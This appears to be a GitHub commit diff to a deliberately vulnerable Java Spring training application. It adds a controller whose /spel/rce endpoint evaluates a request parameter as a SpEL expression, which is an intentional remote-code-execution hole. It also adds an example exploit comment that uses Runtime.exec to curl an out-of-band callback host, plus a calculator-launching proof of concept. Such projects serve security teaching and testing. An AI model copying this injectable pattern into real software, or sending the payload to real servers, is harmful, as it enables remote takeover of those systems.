File tree Expand file tree Collapse file tree 3 files changed +47
-1
lines changed
java/org/joychou/controller Expand file tree Collapse file tree 3 files changed +47
-1
lines changed Original file line number Diff line number Diff line change 2222 </content >
2323 <orderEntry type =" inheritedJdk"
2424 <orderEntry type =" sourceFolder" forTests =" false"
25+ <orderEntry type =" module-library"
26+ <library >
27+ <CLASSES >
28+ <root url =" jar://$USER_HOME$/Desktop/challenge-0.0.1-SNAPSHOT.jar!/"
29+ </CLASSES >
30+ <JAVADOC />
31+ <SOURCES />
32+ </library >
33+ </orderEntry >
2534 <orderEntry type =" library" name =" Maven: org.springframework.boot:spring-boot-starter-web:1.5.1.RELEASE" level =" project"
2635 <orderEntry type =" library" name =" Maven: org.springframework.boot:spring-boot-starter:1.5.1.RELEASE" level =" project"
2736 <orderEntry type =" library" name =" Maven: org.springframework.boot:spring-boot:1.5.1.RELEASE" level =" project"
Original file line number Diff line number Diff line change 1+ package org .joychou .controller ;
2+
3+ import org .springframework .expression .ExpressionParser ;
4+ import org .springframework .expression .spel .standard .SpelExpressionParser ;
5+ import org .springframework .stereotype .Controller ;
6+ import org .springframework .web .bind .annotation .RequestMapping ;
7+ import org .springframework .web .bind .annotation .ResponseBody ;
8+ import javax .servlet .http .HttpServletRequest ;
9+
10+ /*
11+ * Author: JoyChou
12+ * Date: 2019年01月17日
13+ * Desc: SPEL导致的RCE
14+ * Usage: http://localhost:8080/spel/rce?expression=xxx(xxx为exp的URL编码后的值)
15+ * Exp: T(java.lang.Runtime).getRuntime().exec("curl xxx.ceye.io")
16+ */
17+
18+ @ Controller
19+ @ RequestMapping ("/spel" )
20+ public class SPEL {
21+
22+ @ RequestMapping ("/rce" )
23+ @ ResponseBody
24+ private static String rce (HttpServletRequest request ) {
25+ String expression = request .getParameter ("expression" );
26+ ExpressionParser parser = new SpelExpressionParser ();
27+ String result = parser .parseExpression (expression ).getValue ().toString ();
28+ return result ;
29+ }
30+
31+ public static void main (String [] args ) {
32+ ExpressionParser parser = new SpelExpressionParser ();
33+ String expression = "T(java.lang.Runtime).getRuntime().exec(\" open -a Calculator\" )" ;
34+ String result = parser .parseExpression (expression ).getValue ().toString ();
35+ }
36+ }
37+
Original file line number Diff line number Diff line change 44
55< h3 > file upload</ h3 >
66
7- < form method ="POST " action ="/file/ uploadenctype ="multipart/form-data ">
7+ < form method ="POST " action ="upload " enctype ="multipart/form-data ">
88 < input type ="file " name ="file " /> < br /> < br />
99 < input type ="submit " value ="Submit " />
1010</ form >
You can’t perform that action at this time.
0 commit comments